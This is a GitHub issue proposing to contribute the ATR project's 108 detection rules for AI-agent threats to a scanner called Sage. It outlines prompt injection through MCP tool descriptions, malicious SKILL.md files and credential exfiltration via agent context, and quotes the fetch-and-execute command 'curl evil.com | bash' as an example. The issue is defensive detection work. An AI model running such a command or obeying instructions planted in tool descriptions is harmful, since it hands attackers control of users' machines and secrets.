ATR agent-layer threat rules — 108 rules for MCP/SKILL.md threats (shipped in Cisco AI Defense)

Hi Sage team,

ATR (Agent Threat Rules) maintains 108 open-source detection rules focused on **AI agent-layer threats** — prompt injection via tool descriptions, malicious SKILL.md files, credential exfiltration through MCP responses, and supply chain attacks on skill registries. Same rules that Cisco AI Defense ships in production (https://github.com/cisco-ai-defense/skill-scanner/pull/79).

Sage's existing 313 rules cover OS/command-layer threats excellently. ATR rules cover the **agent protocol layer** that sits above — threats that arrive through MCP tool descriptions and SKILL.md files before they become OS commands.

**Example gap ATR fills:** Sage catches `curl evil.com | bash` (command layer). ATR catches the MCP tool description that *instructs the agent* to run `curl evil.com | bash` — before the command is ever generated.

**What ATR covers (not in Sage today):**
- Prompt injection in tool descriptions (10 patterns)
- Malicious SKILL.md content (10 patterns)  
- Hidden LLM instructions in MCP responses (10 patterns)
- Credential exfiltration via agent context (10 patterns)
- Fork impersonation / typosquatting skills (10 patterns)
- Agent manipulation / social engineering (10 patterns)
- 7 more categories (87 total high-confidence patterns)

**Tested on:** 53,577 real-world MCP skills, 0% FP on clean content.

**Questions before we submit a PR:**
1. Would ATR patterns fit in existing `threats/` files (e.g. a new `agent-threats.yaml`) or a separate directory?
2. ATR rules use `match_on: content` — does that align with Sage's content matching?
3. Our rules are MIT licensed. Your `threats/` dir uses DRL-1.1. Should we relicense contributed patterns to DRL-1.1?

Happy to convert ATR patterns to your exact YAML schema. We use a very similar format already.

- Website: https://agentthreatrule.org
- Rules: https://github.com/Agent-Threat-Rule/agent-threat-rules
- Cisco integration: https://github.com/cisco-ai-defense/skill-scanner/pull/79

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ATR agent-layer threat rules — 108 rules for MCP/SKILL.md threats (shipped in Cisco AI Defense) #30

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

ATR agent-layer threat rules — 108 rules for MCP/SKILL.md threats (shipped in Cisco AI Defense) #30

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions